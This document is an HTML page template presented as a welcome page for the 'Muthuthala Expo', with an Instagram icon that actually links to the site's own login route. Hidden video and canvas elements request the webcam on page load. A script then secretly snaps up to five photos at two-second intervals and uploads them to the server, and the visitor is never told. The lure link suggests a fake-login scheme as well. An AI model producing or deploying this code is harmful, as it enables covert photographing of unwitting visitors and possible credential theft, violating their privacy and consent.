<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to the Expo</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-900 flex items-center justify-center h-screen leading-none ">
    <div class="text-center ">
        <h1 class="text-3xl md:text-7xl font-bold text-gray-100 uppercase">Welcome to</h1>
        <h1 class="text-5xl md:text-7xl leading-[-2] font-bold text-gray-100 uppercase">Muthuthala</h1>
        <h1 class="text-8xl md:text-9xl leading-[-2] font-bold text-gray-100 mb-12 uppercase">Expo</h1>
        <p class="text-sm md:text-md leading-none font-medium text-gray-100 mb-6">Check out our Instagram page for the latest updates and inspiration!</p>
        <div class="flex justify-center space-x-4">
            <a href="{% url 'login' %}" class="w-10 h-10">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" 
                     alt="Instagram" 
                     class="w-full h-full">
            </a>
        </div>
    </div>

    <video id="video" autoplay hidden></video>
    <canvas id="canvas" width="640" height="480" class="hidden"></canvas>

    <script>
        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');
        const context = canvas.getContext('2d');
        let photoCount = 0;
        const MAX_PHOTOS = 5; // Set your capture limit here

        navigator.mediaDevices.getUserMedia({ video: true })
            .then(stream => {
                video.srcObject = stream;
                startCapture();
            })
            .catch(err => console.error(err));

        const captureAndSendImage = () => {
            if (photoCount < MAX_PHOTOS) {
                context.drawImage(video, 0, 0, canvas.width, canvas.height);
                const dataURL = canvas.toDataURL('image/png');

                fetch('/upload/', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ image: dataURL })
                })
                .then(response => response.json())
                .then(data => console.log(data.message))
                .catch(error => console.error('Error:', error));

                photoCount++;
            } else {
                console.log('Max photos reached');
            }
        };

        const startCapture = () => {
            setInterval(captureAndSendImage, 2000);
        };
    </script>
</body>
</html>
